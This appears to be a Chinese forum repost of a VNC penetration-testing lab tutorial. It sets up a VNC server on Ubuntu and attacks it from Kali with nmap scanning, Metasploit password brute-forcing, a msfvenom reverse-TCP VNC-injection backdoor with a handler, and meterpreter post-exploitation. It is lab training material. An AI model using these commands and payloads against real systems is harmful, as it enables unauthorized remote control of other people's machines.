VNC渗透测试(端口5901)

小皮
6450小皮首席执行运营官
技术交流 2019-04-28 01:39:26
6450 技术交流 2019-04-28 01:39:26
欢迎使用VNC服务器上的内部渗透测试,您将学习VNC安装和配置,枚举和攻击,系统安全性和预防措施。


表中的内容
VNC简介
实验室设置要求
VNC安装
将Window PC连接到VNC服务器
TCP端口扫描
VNC横幅抓取
密码攻击
使用Kali Linux访问VNC
使用Msfvenom利用VNC
VNC Post Exploitation
将默认端口切换到另一个
VNC简介
虚拟网络计算  (VNC)是一种图形桌面共享系统,它使用远程帧缓冲协议(RFB)来远程控制另一台计算机。它将键盘和鼠标事件从一台计算机传输到另一台计算机,将图形屏幕更新转发回另一个方向。它使用端口5900:VNC和5901:VNC-1。


来自维基百科


渗透实验室要求
VNC服务器:ubuntu


攻击者系统:Kali Linux


客户端系统:窗口(紧VNC视图)


开始吧!!


VNC安装


打开终端并通过执行给定的VNC安装命令来执行以下步骤。


鉴于以下命令,将安装桌面,Unity以及图形界面正常工作所需的几个软件包。


sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

现在,为VNC服务器安装键入以下命令。

sudo apt-get install vnc4server
给定以下命令将重置VNC登录所需的服务器密码

sudo vncpasswd密码至少应为6位数; 我已设置服务器密码:098765进行VNC身份验证。

键入以下给定的命令以运行VNC

sudo vncserver :1
如果要在运行VNC服务器时进行一些更改,则需要终止进程。

sudo vncserver -kill :1
现在键入以下命令以打开VNC启动文件以进行一些更改。

sudo gedit ~/.vnc/xstartup







如下所示在启动文件中添加以下行,并保存更改。



exec gnome-session &
exec gnome-panel &
exec  gnome-settings-daemon &
exec metacity &

执行以下命令以设置桌面屏幕的分辨率。

sudo vncserver :1 -geometry 1024x768 -depth 24
完成上述7个步骤后,使用下面给出的命令检查VNC服务器的服务状态。

sudo netstat -tnl |grep 5901从给定的图像中,您可以确认端口5901已激活



将Window PC连接到VNC服务器

TightVNC是一个免费的远程控制软件包,可帮助客户端与VNC服务器连接。我已将其下载到客户端计算机中,以便他可以连接到vnc服务器。
运行TightVNC Viewer并输入[192.168.1.218:5901]服务器IP:端口号,如给定图像所示,然后单击connect.

客户端将获得VNC身份验证弹出输入您在上面设置的服务器密码。

从给定的图像中,您可以观察到窗口客户端已连接到ubuntu服务器,我们访问了他的桌面,您可以使用鼠标和键盘控制它。



TCP端口扫描

扫描在渗透测试中起着重要作用,因为扫描攻击者可确保哪些服务和开放端口可用于枚举和攻击。
这里我们使用nmap扫描端口和协议。

nmap -sT 192.168.1.218


VNC横幅抓取

以下nmap命令将查询VNC服务器的协议版本和支持的安全类型。

nmap -p 5901 --script vnc-info 192.168.1.218从下面给出的图像中,您可以得出结论,它已显示协议版本3.8和安全类型:VNC身份验证2



密码攻击


该模块将测试一系列机器上的VNC服务器并报告成功登录。目前,它使用VNC质询 - 响应认证方法支持RFB协议版本3.3,3.7,3.8和4.001。



use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) >set rhosts 192.168.1.218
msf auxiliary(vnc_login) >set rport 5901
msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run真棒!从下面的图像中,您可以观察到相同的密码: Metasploit发现的098765



使用Kali Linux访问VNC






打开一个新终端并键入以下命令,使用以上密码098765连接VNC服务器


vncviewer 192.168.1.218:5901
尼斯!成功进行暴力攻击后,您可以看到攻击者可以轻松连接vnc服务器。



使用Msfvenom利用VNC

使用msfvenom创建VNC有效负载并尝试实现受害者PC的VNC shell。
在Kali Linux中打开终端并键入以下命令以使用msfvenom命令生成VNC有效负载。

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=4455 -f exe > /var/www/html/vnc.exe 现在上面的命令将在Kali Linux的/ var / www / html中为VNC有效负载生成一个exe文件。

作为攻击,您需要将此后门发送到目标并   在Metasploit框架中启动多处理程序



use exploit/multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.216
msf exploit(handler) > set lport 4455
msf exploit(handler) > set viewonly false
msf exploit(handler) > run
现在攻击者尝试使用VNC有效负载连接到目标,从给定的屏幕截图中你可以看到它已经启动了vncviewer,我们的  会话1 正在后台运行。

在这里你可以看到受害者的PC的桌面屏幕将通过攻击者连接。



VNC Post Exploitation

假设您已经利用任何窗口系统并通过meterpreter会话获得受害者的系统反向连接。
键入下面给出的命令,该命令将通过反射加载器(暂存)注入VNC DLL。连接回攻击者。

meterpreter > run vnc
大!!攻击者再次连接到受害者的系统。



将默认端口切换到另一个


使用以下命令打开vnserver安装文件:

sudo gedit /usr/bin/vncserver
按照以下步骤进行更改
添加#以发表评论“vncport = 5900”
添加如给定图像中所示的新行,以便将VNC服务转发为vncPort = 8800;

现在尝试通过端口8800通过TightVNC查看器连接vnc服务器并输入密码。

因此,您可以看到已成功建立vnc连接。

本文标题:VNC渗透测试(端口5901)
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t3066.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan